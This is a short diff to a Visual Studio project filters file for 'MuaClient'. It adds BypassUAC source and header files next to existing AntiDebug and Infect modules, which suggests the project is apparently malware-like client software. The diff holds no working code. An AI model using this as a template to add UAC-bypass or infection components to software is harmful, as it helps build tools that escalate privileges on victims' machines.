--- a/MuaClient/MuaClient.vcxproj.filters
+++ b/MuaClient/MuaClient.vcxproj.filters
@@ -99,6 +99,9 @@
     <ClCompile Include="AntiDebug.cpp">
       <Filter>源文件\Protect</Filter>
     </ClCompile>
+    <ClCompile Include="BypassUAC.cpp">
+      <Filter>源文件\Protect</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="pch.h">
@@ -162,6 +165,9 @@
       <Filter>头文件\Protect</Filter>
     </ClInclude>
     <ClInclude Include="Infect.h">
+      <Filter>头文件\Protect</Filter>
+    </ClInclude>
+    <ClInclude Include="BypassUAC.h">
       <Filter>头文件\Protect</Filter>
     </ClInclude>
   </ItemGroup>
